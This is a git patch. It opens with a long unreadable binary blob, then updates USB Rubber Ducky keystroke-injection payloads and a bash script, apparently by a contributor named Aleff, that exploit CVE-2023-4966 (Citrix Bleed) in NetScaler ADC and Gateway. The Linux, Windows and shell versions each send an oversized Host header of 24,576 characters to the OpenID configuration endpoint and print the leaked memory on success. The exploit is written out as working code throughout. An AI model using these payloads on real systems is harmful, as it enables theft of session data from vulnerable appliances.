z(z8()91rJ?6A(zLa9NJTZ^_-K6?)baJK)ln8s9jPPDq56(W<`Iy&;oT;g5nm45q)Q zGA8V=U`8JA1er(gfacDFpBm3uHhjZ8pQ|b4|0iYsUiq^s@P1-e&0{fsGLx#yF^d&@ z8&@u9joO95cOLD6i%rb6;cGbOMOIUZqreyU8`h|}U=TJzRk7}2V*)mBc9xAx0;P3t zoFsebs3O#G0c-@WeLzt6`C!LyTU>5$8`V_MStrj}(OBuz>PcBL@YEjjLBl}(SersM%&)%yaWcRJSMyYR+G zDKnq0e=}poltyc+yGps}>=0V>QFXP+BB3lZdwwjAXxLg!BV-I>qz%V8DEbQ7`be)k zEO-Ck`h^cun_9zHVOUqs7oH~=OvK$0gqw&yquWUR9KOoH@-M$d2)&=neNk~Yl8D5A zEA_|spLHAM*jbW0P>~UOU0l)wf35LK%&sa_{c-`+YsU7^z)Rj5&58p649Yw1Zv2Q)Pv5Gg`-w03yxuwx--%5z zgIacM+5@$(#i0+LjWJo4e)c7TJi-}Og8h5nfQ~d}rU$zE!i>@# zV5rS;L#aX5$JVm;@%|?;qdlQSjqN^ z=B+j*TCWqgOB34N7tkWtUaOSTbC zcEH2oYa=HnT9t48MRTb7E&v_X*MN&FHUw3vPHBQR+^a8mB`CV~RP`-Wr`LzTBV}!>N_&n$ zf6$O%IT2Vl_QpnIfzgh^U9zyLwSNBWGL@p|NvkI_PnSu#?gh{LY<9d3h+ngR`&wuA zEXH|UP2*!2BJo`>`|@+R}q%>B>A9@2%5 zr%Y2BK#AxS!;!7N6j{qc$3*afFT=igxHDpQ9V5I9SDJGtCh{lw`UOxf++ z9zBp%Z2W<5jjo&5th&D6hjkw}NJ3GG9yS6Hi44$U^qSfD=gK-Q$`uOd z#PZl0C9NyVlr7N0Fh)BcA47ipjFqD_-vkc#?=EgmJZ5=LK4pPB-z(I2(-*H>2^EOd zCEWf}JD|?;>xvAS&@H`O6Emy6ge#h$RoB@5D5wxS#ia9MC}dy%4iQz96&3JR?>pi& zrDRzPbb=us(l|GNaF!fuA`~+USwWXZ8yn5xlzQI&NC-H6IIt;@db++I9jxHgopCHn zjNzTV-P+^AJZJh#ck(%Zb(f^CtH=1Yjhc@A?{2O>o<23 z{&Zv$a@_+S^szLiB)>mlYe533tGkkbY$cMAeMJA+E~DZotZZ+&&uAh{-4@Hcm9l8j zm(4{haaob4Aj;VDmrUSHpaY!lgaK?gR`W;u4vp|MdxG*HI1U%D4+h>w@VO z=;PdoeqTx}k53gEHfuhi?vk&-{u$<^^>gr6I}XF3YaH4Q*sMZm7N*s#&g|@(!mBm@fnEI-u`Us#r7_F&hVEpBn*>~ zyx5y^cJ|c8OA3d_jLishBA8@LPY~Bac3t*d4Ptc4>X%6lJMaLvXMIasyh1|5PtS0W zvp>_{5P5D}YRPzNR*9w4G>~x<32|Y*j;{WrrsJ3 zqJR0uYa1r)`g$|Ttoy~tC|gg;<)L6aBi#UFl_7Ujbk0r&t#VeM#BzO_Musi0R#!TA zH6T4@b}!dyLZ9YX#731x)e9%U| z;j1;G`a*gYCFa+;e$s=eYD)4b^2uJCozDkSr@)!7b~JKHP4VEV+JskxY+QEY)YB+~ z-+P~j0E8m9;;ubEVFzDfua&Dyrl|zEI$(i@B292oncRObt9S^UcGKbQR#zoZ?uPPocPexY$hJvO)a8Gw=3voV}Pg9 z6b5}%;&uSZz~8Js3_iV+&;<}lp|-=`x*n3T=a$RGfvrTMR_$F!WNPV|cBuR;g7RI* z|H=h`TESaycbo{kKqSnncVUyP^1tG~MvEiP!oXt$!K0kay{DTLpK zaxvLT5C!K`7_hRlW`AF35J-k?B z_Y8}e3c(IlJPpK(y$%g2YauZXJlZdkzs8FyPMT9}qE!Eu5Apc1PVt-Tgk^FG%E^RtSM0Unwzm7bIj~T>l;h#9Vd%$2T_jQq2A$GX_<1V?=;2Z0M zZm8-W#-w)S5635!yQdtI)Hq(Bj`cu(c4q4}S1+zyn#5sc(n3m<3390&NT_%P_H5vL zj!Vn@nZTRK_>-Hu7h#;=rl`W!vLRQzl?a2+_J=gtM&fi)Z4abNKrM1+E2d^04EYHn z&iIqR?v*pp1R$;YA^YGJTf-Pm8AZt1{o4##o}_vfAKKe+XD$Nvk{2|kV{)$jrGLZf zH5~Z;39bj`Q;gV!kzhL+TZ5(1exETyvOuK}8S~%4Q869Zz@*kOP172UT^$Cuy%AI` zZSA+wmyzy-mAKG>1Hx9eKb5)C%OABaU!cZU2Usg-0I~Ls?w5F2CT9de!1f0>{U_Bn zygUA}`wo%ht)Pa;X&jVYa1+MyTMhl{Av;M@@vn%H?!Onw@dTOmOM}Yv@P1*Tp`jhn zE;!7)X1t@1%&N7QXVMqJqTjB!$hvK_`kP_ncQNE1Fp~D)J9ex#oCydC3GLC=+#dD4 zP$Eld-?8%YzhqG7#`H}3S3rmFuG-RNp6*Xk#D<2xSWSUz6WQpN-DygZ^Vup606UjOY6yG^K)i&y!aIIXUyqjKp!FWYiyL7NP|IEdDH{3sg zboedt%9bs3nY;R{r`3>znH-7)I$gNtaO0Xx51fP@p4TGpOT6?fc$y-Ih)#H&Ql$u& z@GfKM*-@5G!eny7TuL8E@HuEG$uIG*^SYg@dEXj8t^8(dp6n^9ZLYz)a=kwlq03>! zWenQQ9*=Nl`-^dV{qsu1CgE)@90-e2H2WMbqKMa*?*@}bg75HK!WG2N#c<&o99T^0 zXrdwrFM=Pxxs0DY1DSg+;Mc9<8nV6}pOs#6kA~m?ZxlKdc+*f)`WGU$;iwdMm}09T zuzRZd~5w{hk3#mTdd9hC+*Ldv;SMyC~fS z+T92hZjd`jpr|XE*o3<#xQ^D295t26u$eq`qS@j~=lM@Y?w_V!*SUN}fHfG7*r%zt zQpCH>D+9WHm0bO8orbHcJBAOzbZUi@le6qu;hoI-8Gwb=L+^Dm^sb~F9yGtK? zIx5k}NTZ6CMBvF`?-w-kYoa|rgV zT>K=lw%RcqKOg~8&ly|$Q`ejMZ+NttqECG0m;%mu%Ez!pozeUSY=G!xGJL~)qjw$1*x z&B;@AAL3_Lfm?Mqik3k%r=>rFaQ0h2pNIP#jX+ z-HW?Jad$6PG{xOr)1Zao?ry=I3H{HVduOegyJlw1`!QK7dCxw!_kMoo>=exQ9zeW@ zEO5%YUFzW~^UZ4>$xp;y?M-dsX>US;&SZkweX=oq@{-w_Kw;>HK5$>JlB?E=!b$sX=~ ziHS_XfI2y|@jtt;{r-s}_v>|YAw9it)X6uB+sp=)lqFhUiW6(RFEzgdZ%6@uOxI&b zLQe_@5|m7wy89q0dkR4o3(ZK@_)jr3JraK%T~OPP)#)_B>zpI(-&qB}FsOAMTLis4 z(Y01tp&;QF@dR`i)_5KebW30Uwgwz4|GPZ zww1m%c}slY5$|Z@iYrsqqlqDuO)zvBwQ2p>z{}$MBI<$RYw0iaAQ{yHn+A=8W}DSr zrzgWh4WDhCmJnrf-_@PJ2|znOI|1uG<*wnr_pZnN=c%r-^LS*ZWIf*DN>3$@qlM@a z2PSsZuHQgUlyjDM*QN3N7p9qg80yCl1E)FGzf^N@gEANGioV87t#jFvBUUaMs)Q)w zKH3T48_IfPuZBeHRxuY;YOjLd`^FYGqP)zrnZw-u@U^TqETAjBiDdoy?f`XR;IP#P z88;Hn)C~Bim|>OTk2pM97(^PEEoXw*fcguu@3bZLpM+2Us2AgwKzjA^I#$W&0m`|O z>tF6I{5(teSG7xDMpOu9Mc`C`EX(JXBVLti-L6OzIfm~ z@5q}8jBoGgMYb{!8|y&E{4znalj$*Xb4k=ll1wz}mEu3dOpyKJx%(hJ-W*ezUQQ zhvLR}4AGW1&9wwo;Ry;CI6huP&WqBp)mGtLe{21=v$xr*&UsGL&f0bAjVu+YBh-9V zr>f`96nKx?C#>*;^Xuv~IDKBhbtPChSrrKHEltC4&N)m@^Na?=H_(L#Vf?BrrjXGN zI&9Z+Gf(sL(P{@rOO_Uj#iFAG-mG*del)kHbzJ)_VJ0C<$HLEYJ1W!BD>!)?zU-`c zRI`S*wkYs(O&ry68HiDUap>Pp=q3XX!Sc5l^$JcHJCDbT%Aenp?Axd{G=_I9v>VM< zWMvXkry++1cVm)b8(*IN70EY7TQLC=jn+UK(7| z;-ypLqNO>ivKI3MSaB(o9UHf6RizT@EHvFZGkY-dh0Mlc9sk&@60Xl$F&FgQKeR5L zx9%@7Rbdl++JA2!ZUipfppOj!8zlxix!rjhc)AG^=Sl#N4h z>va9#dcT|NYl^1Ehh_1(-}~+L!JQ0MzMh5B5dL!M_Dn6c=1-b?e6FKcJ$(2qzg3E3Pb7!(;OUd9*u4WMx_Cs@#0`CWNRTlzwSIcPQ}^1!;>t!r}?a z!ZojAwo*Im#rcZ{T8~-azFf!Zuaq2%8A<9IYBf23YSG~V%Rbv-OyTu7;M<^!me|4v z#b!#-;#FwMW>-V=RN#kYULMhw>B&ihEBne!Uua+fs#cxzu&ZjjW(J&|I+2Aegfl4# z_t@RW#rkWns18Cv7IT*Gd^N~4##AHCQ&Nl)0PI&+uPTEpozK6vd#fjbP*f=s#w0Jl z6D5W&3^tcFWF1l(HvPW+X_S9nF5kz&4Bc*fOY+$BS+ilSYN9Ia^DwyDqt8s)mE(nY z_1*Q_sU5c;|L1J)b?l33ju zJ&yh%p+%W}dy6Y?>)Hq;Q6}5;<7{}(rZJ5y&C-#EdEm2DgO$J$&AZ;5u5bSBa}d~X zK4tmLwAQAKN^XKsy8)3U0foHiIEXrr$=l?;_0+k)DYbx3xSwY`310Q5zP}%PA@IS? zaN3sku6qfrO2m+Id9)s{L_-q&)O!@$&tX^V;Jz$00%n%G`ApL(xdg~QbGF2Xms-|5 zKFo-UnXWMYv(&R-9Y-7z&Iyyh5JsHN2Aj;crdB#Q%CNM+41a-c@e!Gl=Tn;QJ42Od zz~*^qfN|ARaOokLKiB=2zgx4ch_0?LYd9H&v#+;3ZKT4JLQz~%G3&hVmt9AyEN4?N z?qCQ(bJLxDfKaY)HhQ^&J?U0?(3w#U1sAkqvxx25S=_#5T6T19+s)7EUK^}kc|Gay z*ggx8Zsu~zs{qFifijx8AXfG>9zGr;&^kt=Mtz$osCK-?Gv&w z#GjgM$Dl7nYC8`L=R?5ZdPm4p11!ju`^$8w=ZE_=-yN-W{Fkf^;poU<-G+|6QosTe zdxpys@9rj&;>?}qsfqV(p*75 zE2A9)_g04bH(itI$4sMv+>%tmyOk-Pf`iWE$i{vV3v5 zal%dyZ}$C5E&AEfyPyZ6(wL*SctpXdm4V9}6ZJun*QaJy0=J5XO$DI-+N2%+N<4o4 z82vc-5wE}?+0oG=41f#k%{IkfwOH45Ot=k< zb3En>kB{SNN?z{&RSTZt4P@XhyFs zIH2e{fJ#A0DtJWK-{oa5?8!W*INriI3cx?4)9gnI*@y6WK_lDD+yxj>X6#u=N*iWt z_Bp=%s0Dx9>p7V51(xOTcTAyp$BFCxP-d{lva__@Iz0M!z5pIGHVfRf@AJ zrtYU~^6PNDv!aWbR9L0kBS22%u8Lj{>DY;R38n=US|P8`m&7|WTa2wooRpq-;Bk8! z10=)gkM4ZG@Non5X=yvetVjKCnZOZsn;o+T5hz>SNzWM+A zU+BZ{@pZGYkg&3{yD0g*wOn7h$&CIQIwm*Yq%o0FtfA+?Z#Wd{XaMGR>p8tWB|r##X=h;@Ebip0Em=@F?N* z%WK3dx58M%2amhuw+-~kq%^wqkzTQ-@e(!qT>}l{E4i*er%`~apT6?&GN=~*sVNf9 zXV6P~!-da#A~Qi(YfY|+b^Iw#Ny&W4=;PE6B*Gp1kEv#M-3_W1vUdTqZo`PFye&S0 zv?L{8OOyrBuQ3JWA@Q96<00|M?}h?%ZCTdjs-4}FQC$aMs!4A)q3NZM+UgT%G4Z;M zDd)LjO?w=-PVcXzoej6H#Wy?*3WNNdR6JOI6(*_lK&q%WoWa68D}P}t02JiL}&*;RFtZwYd~JN(5{h-hKd1kYy4$g@$n z;odA9mUsDuBNSBaclcrA3l|3UfJ*1>f!k9m(6i4WeOd71Lt`V0fPk(*o#OM2-wEho zT;^Tld`79OQKIU)O`hP=%UoZ9NsINh2;0H}t2vjXEugO1dh$N5wQ|q_a}*;13&Go& zF{#*&G1A=a52DuMqgZC$iPW;kZGo#e^uJd%QkamQBp&?f-%Pk<6`F9gHu@|rMSKr; zIbUc^ubf*VS*T5TRk5V(!1BrXRfCOIV^c0W^|ZKfT$}(#!-@wj218Nan;7atWPCP3 z!g1oNh1QXe48}3XZiCeR)9=^1g1l>CIz;UB^ZNcwUb6EG%vx7*om|&mX%wFu9hX08 zN`w&9_+wn|N~SCf6#OykBAE9=m~cqz_IubpDc9L*B76@RS1FhJ((+h3?-msd48|dG z3Xk+@gLyIWoD1X`0Wz#gGn(wt*{SsNv?ymwZdbW%*!<>gl)x@L!T=y#o_PTTZ-Y|f zh9>XW>lK6|0Z3fX@mN+hQisC22+mE&7yI4@klwe6!@k(6N3SP?R>E*)Vh$L~)w@FR3UM8RlivCuy|QJJQx*q5ITi@(MfJ zVa1pVv@I!-MMifGVw(m^kACk~5cV=(H+ z8aigY>RthrA7~3{BnGFKEwEV$q_&r0$!myDXM6VV>wWnL&Ag;KMxfA^aug<13w~x3 z5MjsZ%=z-rQF_sA{W?y8XR_}Clr^75?i;1NN^n(v#J(f9BOspF*n{2q+fZn_CEoSz zYm{-i+i*702~CfngisbEZ>gUs#i`a0cVuQpvRiQ z)4@kT$mzsoJ=pRO4O8+f@*OABVoVp>C6WTVU{3@}Vr<|>ViRJYA@2APEUj$kR1~k7 z`7z^%Lf%Gysmd$6n|N5)e3QZ{lV1k`?6#DRxtH|2u|@{{=H{a`_fhb9`}y&)%wbj! zVM5!&GHDq1W`%rNZcXZGk9hf%SGHS20ZX>odf{Jn$A(VIe!lo=fl&a;Y4Ul#)BV1n zp+~?W<K~Qi zVg6EfgGnv<0N;h>s>NI2lrbWr3?XEE)4r`e^G5G@%_GMl(UUFEj7D- z2dnC-VVldi#<{?y?jQqQyR(-wL`tcE&tzTG$tDH3-D>wZl+7#~!_A}oQ*+js1YL8a zyRHS5c`L>@n)|{{wlg+-d=X`gWs|FrNvLb^%B`WRuL6w_>*06CalPGG(}#BZBM!pl zZJ|ftz9aJ-xEA8^z+5giuOoavKwU0al!{!BlGpVjF0Qv-E-T2A7&2D1{6=2vJGnam zP0cMv=+Im8Y#LR5p`NDlur9- zW-=G}#9Pd!`$61wlbM({7kev1%#5k^nFQFNSHi>7N*(LHhZ&9UqyVYB4ML$tMGSu$ zi-0~V-dPW4cd`8{0wjmk83kahXkfvfEp9C zMiPNcedgR-GL~u8D`w^Sj{Te-klECC%P;ULu8?6D4I(7fuv`xl2se+R4OxIM@b*r~ zxNkz`{>C*uh#sHwTa&@k6_Q`dn$(a(NH!SDupefec=JnW#P%fqY+%XwE_A!us>vt1 z#`W*l$`xX?7vcAVJD%k5?H7awYR0gZecWf*Rc>Hi6dyGlS=hy}ej=AMTm0#eS8VL= zfMTnZsz`mn+hHh>;3Lo-Mme7<{F7Ta*er$>(NZ!lxfaTJ?{3F03>54N`pPiV{5RK; zy1Qc^bZ5^n+w2O|Qj^bdoF2V-^cU2~n-WY%OUlbwmzpZ;@b}bkReS*evnew=`CaUf z#^z~TR7-fL(#N2X?jFD9uplYHx*w?0VIWv?Mpdhx5uVnGt-h#yj@}SpT=+%WR325$^+a?uhm?`S>m9MgVdh z3eqk+p8>{QTAgLg$#mPcj0u&ujYRp&s60q##q9kcYV?r?WP?|$DW!#{JUSS;Av2}= zisC0C@<(k^b9&(qf|>J~Xxa7Fbg*d>K9}sSz3j^x&%bQqE=N#&Vo}Ky>gbW`8}35R z)563neJ<*gxb(u$!-Pv?QL*n9i>43QX+CQ9bDz=tX;WZt=h2tAInpWGGJkQV;qUKD zX~GK>&@=y4-{_t~ySRISoFyH&6TnJYH_t(~J=^4T#1)XFJfv+7{zPauwtfMjMFQ_rpH%H>*DI!E%KV=;+%d-J404ql#nD zP4$u&$99amzoK|`oA7s^O-w7Inb2Tw8dld`HauBE*>!A`s#OElxeM>?jQ-SP=-zrr zx;yvZZIb@_TH&Q=Tes?VRwT~bi*D`<%3R^s7n>$w?5x!{)A@-ox{|4^s2ia{P9Ie5 z!GYrxR@ZTsxycfd^&;Be%Dx1897B&T{3N!u-mUk|_bWT(J~BsA?$c@+ljNtsoM$Mi&nJ?SUNeuV$@eKNb6PL;?z`wq-+=;-w-$`zbz&M@ z`ebr9HeQ#y_1DwQ|6u@V(haZg?xR|JJ=!ty%m0M%_Uy;)HUypT|4H+4^yw)RrG+QG zy%qiE0^lx_*4V-!PFJ>z{;41Swqxokw^6@Zrd?BGs_wAR#>1u2jJa9_OleL`t_h?+ z?_LCvVJ3;ZOoUZ@5}fhEeDUIqk(8K-@_C!MH5!M>);)r<55drHCTsICcvSyhSbs0K zOF7C!X&ge)i0=@PPL8d+%KDw&&RRHPQ_sg=>)Hk{l5oWAZ89vv+JaABcj&y|y%J#v zJpJ}s3vJ-Wt^Zazbb~aBF8h{I#E(`lrzZU?Krv}|xZC2;uB9p7K!<pgG} z!~AW);phU@7e5{xqV3@mlgs0dFSz^!@Cd1L`-AKfERHTr#UNt+RGMmqrc`rVb6n0T zkeJSGy1G-`=Tf#HHyCu4+qX# zfttR(3p<;5!0eZuB%ElGj(k90`zWJrVNxo+SPi{)9ww59mm3#*9Ek7o-sRNCO-Mf6 zH0AR3kkjibUiC3{Pp={U&b=tK*3Klnv3+<~bx{sGg;a;%hY*&kT4n^`N<@=%O-^29 z55?Te6nzYnv~scz4Y{FO-{&yYDF`Y(zPO)z+*U8I%y&kb@?bVnNJtTAR($L!)z%sd zx-`=~ajsaie=dsS`5P2aJhs(Pi0pHQ3cC93<&?@SlqJ`W`qm3XSFpU!Q_w?skkmF5x`r5BuF)UnrW3Eq$eYKD*GmojN zeN(;ZIim6e6io0kdstRZ_8l3l7*w^f)`TwQe!QOgBEuxMmis(WfAjZs*8wHQt$IZw zHMD`*MfHd1Zd2kAKkN(({%hy)O-ymwwV1SJaa4 zix!#*S=rO;!j8WCHr}Vg>U*WN7A9i5QcgeXx+P7(mw4oVlKc|AxC2+(;3|zRKak?- zW1(TDx@Y6x`H|q(1ScIl_qQC=(*ISs|36Xr|3Lv^(p@P3BY>dVeV!1`3b^ZBjoPe~ z6rpRhogw2Nt4pQP3+p08?aq{A^^stJVj={1eiQ?TxBYLR3;>KmV;#l!mP;2~Oj zm7k;7FnTjHi~OBhAkfiMjm^wP@5f>#t$89hR`86l+;fv3N&lM+x`DvX`=cG9CK)TY zdOblUP|jSzl?}+5+4mjx4wY0lZUTge2H>x5R>_yzK%OKcwx=;_}lN5ZSl;* z-*6x*F?Kk)Y7)648m`HwteX~Vt3E&eGt#p=GLB`g-h zKc&xBixbQHw`{YTKJvH)&iDH#(kDgZ8v!oe679RTx)iYPi3ks!(Q&Z5;b~+_4vs{v z6koIH>d_moO%=9l<$}O1#BjKQsE8K7g*_`FtNnGv>T*rcj4s^4Wz77c*tm%)LG2D4 z1hJ1baPiGOF$$Ey~CLkc`*NN-7tbPYA z!)h77A(m=uKM+1}H;w-%)p5V@{FnDB|3D9^NE|RmGyx-blS>aGudcSp^+~^Tx1=Zl zY|bx9WCd0KMODy7IvU6VE`zovp=&g4a<$hPX|=;$E(!|UaCl)LID*nIrt7LkGSpGE z{pl664gF25-eoo!g*$6Fel&l-&46B}<`-b~dPtOZ9hIrim*?Jl9&%C+2ZLNcZAL<@ zvUxLg$XR=^vE`YJPn(JJuS#M-b16e+EStIFAGwF_e8^7XbN?|cVN!!kaL!~`N;jjN zQnR|_!b)@cE_2Sg%^qq_v2kwWqh1$i zzC>y*$3=ku2GVAGreq_S8$r4%b&_ zjqjUHF=;8+1+|~wUN^z?pKxVDX5#nlJoRf7DU8HIDVJLdbRJEODzPWGEYT(g&4yb! zR3Inqe;dB}|DBfqi(Jod-{}7y*?})vzJAXjP<(9~h_xu1!9CNG^)i(=E1)b8aPd=Y zHMh}Od(e76U6x-cMtylP01*!1aF9!-jh?L^*v>lkoN^1R!P~xZsPs%0#dDn5?xWsQ z3eK`=Q}OH|$1(HI5DnCKW{MdPL=I<>aV>kepRXp3N2i39Qo~_zX@ha1HQ_lAPhbQs zv%zT8H3ijkGmnM-&0{IhF1Z_B)Fv))B~@gsuwv+Fb(apq)XMt2Gy{k4cobGPzkae_aKtqM5JbWoixtn zXyZbe!GLAtdM-KyA$YqI{dB#a8m52u{S>#DJqmt-`?904HYVC#ltItsZf(VWl+5m< zmHWAyyLb-vmc!8)JlrMx|nwlJcQP|?eItI#uqygv`*I(k*1wdP9s@2j?fD_1ESL62v&zBy0$fYvn~H&n z!hSq&!btdp+60o#TVLVS2L0K1!45HX%G)lsYrT`-Y_TEDj+Te@HaRAHaFMr=v zDC442h7a{(Ro4(Oy}^#D1sh?6Ce*0Q@1h*ZxnI6O$D%!rF zkQ0F{uPwPXmjR8a{yP4VIHpGPbqJsY_4XSOLb?BSmMaUnl$?a$i*&v^b60aP!uY#Z zoB8PRaT(H-JiKleI3%W3^;=yZ|AET##CwG-ks5c|PKQGqtRDv`3z5OMwO?;<Zx} zR>p9(%NXSwRbtZYbVF)~9~eKwXN9l{1-ODah_=GuZ_x;D-Ex2ba?L7#FYgF7ehj;Q z=ZQG~C^qkj3GtjyO7d0@4O_jU2wVPlbjS1+e)=4X8O7E?r$Vai-qNHzbIwgB8pvm5 z>#6iEYw3h8qVBSJJe%?zS!msu3_i5S4!zv9yE6Wkdec)wM+3FZ8^v*hwf&byu>IJQ zNmwJu7|r!_HsC7;L8LgY=d&Ak^`Gtj57H&F4SDYkWxosKd(M|nRVM*wI}H?}?_Jwq zF}DFX-QtKb1zljsC!&prDUJI3zUH`f4ScUG)x%Tqm#DfQ4|imFi&xa_KKNhcVfUqle_ zH!(c0mzk)RP2@{i_ZAJXBs8j*`vk~4c}5*b^c)^0*yXw+=~x)exTjflqU5)b!@+ongX<7RPG@Dp>5krRhW5_=4ttn-Qz5TAp35W0u2z zVw3#L2w8pbyI#oMO%z2}YL0+PxRAc*3f7T2!vC90Q4+|G|7f$cDdp-R=m#FE$ht(A z-8j7{=&X=Yw_{;%Zx7PrAF!28$3ofXjJ~hU?tzTjGrVEhgg|KVSJT_`wg}jHe1&3Z!Qoefr#J9^3-oO4PIZezNt!7$vp73Gq88%w!3E7@Dh-xZYoK z3}W3RgJVAJL^BcgmX{9a*W~q#X#>^k^!Chg*l&wYEarpX_zve7T@jW(S_rpre>5`Q z&hn~a4Rq3Yqqx_&KahCr-8?PV*H4~FcsgwAay$?Hq4BW8b3z=Q%9fz($_zJ#RJ2d~ z7cnY}s^DrtJAT(QwL`JpOud!VK)ttTIH|HLRzA_@bK#-xQrinw0bRx(* z`DbTBsvhg%Osd1p>lJt=1C0InMc3CqCu$zW=>#;IgIZ>O0wdrGQAglk;0Kwk(Y|bI z_2PLycV*IjBwM?u5-FF7Ut0Tl`K1 z+DM8fiPR9P@$+g)xNbdQYyNRudKvDVJyf|DV@5Ia@3aHbuX~o%IGwpaxmS#r{63u% zUjmALFd4M4^lGTVX(H?_NaWTmkB}=_nWmHJ&VZKNW!m6D@=FeDrGKuhdf5~Yz8@*C z1G1Xhv@e_RDRV(R6-Cup-Sfi6`anY?$Y)j+QKHLn2LIsS^M5^J{9klUpWWjB0doHA z4pRKjg3UbHlk$T+!ydi>WjQs`DcCq{{rYw@UQ>? diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt index f829d4082..cdde737c6 100644 --- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt +++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt @@ -3,29 +3,29 @@ * REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 # * REM # Author : Aleff # * REM # Version : 1.0 # -* REM # Category : incident-response # +* REM # Category : incident-response # * REM # Target : Citrix NetScaler ADV; NetScaler Gateway # * REM # # * REM ################################################################################## -* REM GNU/Linux Version +ATTACKMODE HID + +QUACK REM VARIABLES +* REM 1) Define replacing into the $HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol. +HOSTNAME='192.168.1.200' QUACK DELAY 3000 QUACK CTRL-ALT t QUACK DELAY 1000 - QUACK STRING header_value=$(yes a | head -n 24576 | tr -d '\n') QUACK ENTER QUACK DELAY 500 QUACK STRING headers="-H 'Host:$header_value'" QUACK ENTER QUACK DELAY 500 - -* REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200) -QUACK STRING response=$(curl -s -k -H "$headers" "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10) +QUACK STRING response=$(curl -s -k -H "$headers" "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10) QUACK ENTER QUACK DELAY 500 - QUACK STRING if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then QUACK ENTER QUACK DELAY 500 diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/script.sh b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/script.sh index 2f36954f1..6bf2af155 100644 --- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/script.sh +++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/script.sh @@ -1,12 +1,12 @@ #!/bin/bash -hostname="$1" # first parameter +HOSTNAME="$1" # first parameter header_value=$(yes a | head -n 24576 | tr -d '\n') headers="-H 'Host:$header_value'" -response=$(curl -s -k -H "$headers" "https://$hostname/oauth/idp/.well-known/openid-configuration" --connect-timeout 10) +response=$(curl -s -k -H "$headers" "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10) if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then echo "--- Dumped memory ---" diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt index 712f2aada..1a2efae1b 100644 --- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt +++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt @@ -8,7 +8,11 @@ * REM # # * REM ################################################################################## -* REM Windows Version +ATTACKMODE HID + +QUACK REM VARIABLES +* REM 1) Define replacing into the $HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol. +HOSTNAME='192.168.1.200' QUACK DELAY 3000 QUACK GUI r @@ -16,30 +20,24 @@ QUACK DELAY 500 QUACK STRING powershell QUACK ENTER QUACK DELAY 1000 - QUACK STRING $header_value = 'a' * 24576 QUACK ENTER QUACK DELAY 500 QUACK STRING $header_value = $header_value -replace "\n", "" QUACK ENTER QUACK DELAY 500 - QUACK STRING $headers="-H 'Host:$header_value'" QUACK ENTER QUACK DELAY 500 - QUACK STRING $headers = @{'Host' = $header_value} QUACK ENTER QUACK DELAY 500 - -* REM Replace #HOSTNAME with your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200) -QUACK STRING $uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" +QUACK STRING $uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" QUACK ENTER QUACK DELAY 500 QUACK STRING $response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10 QUACK ENTER QUACK DELAY 500 - QUACK STRING if ($response.Substring(0, 3) -eq "200") { QUACK ENTER QUACK DELAY 500 From 40e28fac9b9b62a958a93ed8d507198cb1782c9d Mon Sep 17 00:00:00 2001 From: Aleff Date: Sun, 9 Jun 2024 12:05:03 +0200 Subject: [PATCH 4/6] Update lin-payload.txt --- .../lin-payload.txt | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt index cdde737c6..49a60d6c4 100644 --- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt +++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt @@ -3,7 +3,7 @@ * REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 # * REM # Author : Aleff # * REM # Version : 1.0 # -* REM # Category : incident-response # +* REM # Category : incident-response # * REM # Target : Citrix NetScaler ADV; NetScaler Gateway # * REM # # * REM ################################################################################## @@ -20,28 +20,28 @@ QUACK DELAY 1000 QUACK STRING header_value=$(yes a | head -n 24576 | tr -d '\n') QUACK ENTER QUACK DELAY 500 -QUACK STRING headers="-H 'Host:$header_value'" +QUACK STRING headers=\"-H 'Host:$header_value'\" QUACK ENTER QUACK DELAY 500 -QUACK STRING response=$(curl -s -k -H "$headers" "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10) +QUACK STRING response=$(curl -s -k -H \"$headers\" \"https://$HOSTNAME/oauth/idp/.well-known/openid-configuration\" --connect-timeout 10) 